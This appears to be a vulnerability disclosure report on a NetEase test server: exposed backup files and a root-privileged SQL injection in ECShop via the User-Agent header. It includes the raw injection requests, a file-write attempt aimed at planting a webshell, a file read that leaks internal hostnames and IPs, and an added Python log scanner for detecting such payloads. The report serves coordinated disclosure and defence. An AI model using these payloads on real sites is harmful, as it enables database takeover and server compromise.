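2016-03-29: Details reported to the vendor; awaiting vendor handling
2016-03-31: Vendor confirmed; details disclosed to the vendor only
2016-04-10: Details disclosed to core white hats and experts in related fields
2016-04-20: Details disclosed to regular white hats
2016-04-30: Details disclosed to trainee white hats
2016-05-15: Details disclosed to the public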
MySQL injection (root) and backup file leak on a NetEase site
Directory listing is enabled, and backup files (sql, zip) can be downloaded in bulk:
http://tx2-bk02-30013.i.nease.net/
The logo directory contains ECShop, which has a MySQL injection running with root privileges.
GET /logo/mobile/ HTTP/1.1
User-Agent: test'+(select 1 from (select count(*),concat( floor(rand(0)*2), 0x5e5e5e, user(), 0x5e5e5e) x from information_schema.character_sets group by x)y)#
Cookie: ECS_ID=06b1e3e2558cdd1cc6e4c2f7aeaf2980a0b17577; real_ipd=106.38.178.198
Host: tx2-bk02-30013.i.nease.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
[error] => Duplicate entry '1^^^root@localhost^^^' for key 'group_key'
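I extracted logo.zip on my own Linux server and tried to find a writable directory; unfortunately I did not find one ((┬_┬)...), so writing a webshell directly did not succeed here: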
GET /logo/mobile/ HTTP/1.1
User-Agent: test' union select 1,2,3,4,5 into outfile '/var/www/html/bak/t.txt'#
Cookie: ECS_ID=06b1e3e2558cdd1cc6e4c2f7aeaf2980a0b17577; real_ipd=106.38.178.198
Host: tx2-bk02-30013.i.nease.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
available databases [4]:
[*] information_schema
[*] miqi2
[*] mysql
[*] performance_schema
The system is Debian:
#Netease Mirror
deb http://apt.x.netease.com:8660/debian/ jessie main non-free contrib
deb http://apt.x.netease.com:8660/debian/ jessie-updates main non-free contrib
deb-src http://apt.x.netease.com:8660/debian/ jessie main non-free contrib
deb-src http://apt.x.netease.com:8660/debian/ jessie-updates main non-free contrib
deb http://apt.x.netease.com:8660/debian-security/ jessie/updates main non-free contrib
deb-src http://apt.x.netease.com:8660/debian-security/ jessie/updates main non-free contrib
select load_file('/etc/hosts'):
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# Following entries are specific to your environment
123.58.190.48 h1-o
123.58.190.49 h2-o
123.58.190.50 r1-o
10.120.190.48 h1
10.120.190.49 h2
10.120.190.50 r1
10.120.165.165 r2
10.120.164.144 r3
For a test site like this, it is better not to bind it to a public IP.
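A defender-side check for the request pattern in this report, as an added example that is not part of the original report or of any NetEase or ECShop code: it scans web access logs for User-Agent values carrying the SQL constructs shown above (error-based GROUP BY, UNION SELECT, INTO OUTFILE, load_file). The Combined Log Format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: Combined Log Format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?:[^"\\]|\\.)*" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Markers taken from the payload shapes shown in the report (rule names are hypothetical).
RULES = {
    "error_based_group_by": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by"),
    "schema_enumeration": re.compile(r"information_schema\."),
    "union_select": re.compile(r"union\s+(?:all\s+)?select\b"),
    "file_write": re.compile(r"into\s+(?:out|dump)file\b"),
    "file_read": re.compile(r"load_file\s*\("),
}

def normalize(value):
    """Decode once, replace inline SQL comments with a space, lowercase, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", unquote(value), flags=re.S)
    return re.sub(r"\s+", " ", value.lower())

def classify(value):
    """Return the sorted names of every rule the header value trips."""
    text = normalize(value)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (client_ip, request, rules) for log lines whose User-Agent looks like SQL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        rules = classify(m.group("ua")) if m else []
        if rules:
            hits.append((m.group("ip"), m.group("req"), rules))
    return hits

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = '''
192.0.2.10 - - [29/Mar/2016:10:00:01 +0800] "GET /logo/mobile/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/45.0"
198.51.100.7 - - [29/Mar/2016:10:00:05 +0800] "GET /logo/mobile/ HTTP/1.1" 200 812 "-" "test'+(select 1 from (select count(*),concat( floor(rand(0)*2), 0x5e5e5e, user(), 0x5e5e5e) x from information_schema.character_sets group by x)y)#"
198.51.100.7 - - [29/Mar/2016:10:00:09 +0800] "GET /logo/mobile/ HTTP/1.1" 200 640 "-" "test' union select 1,2,3,4,5 into outfile '/var/www/html/bak/t.txt'#"
203.0.113.4 - - [29/Mar/2016:10:00:12 +0800] "GET /logo/ HTTP/1.1" 200 2048 "-" "UnionSelectBot/1.0 (+http://crawler.example/info)"
'''.strip().splitlines()

if __name__ == "__main__":
    for ip, req, rules in scan(SAMPLE_LOG):
        print(ip, req, ", ".join(rules))
```

The same `classify` function can be applied to other request fields such as Referer or the query string, which is why it URL-decodes once before matching.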
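Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-03-31 10:37
This site is a test site and has now been taken offline. Thank you for your interest in NetEase products.
None yet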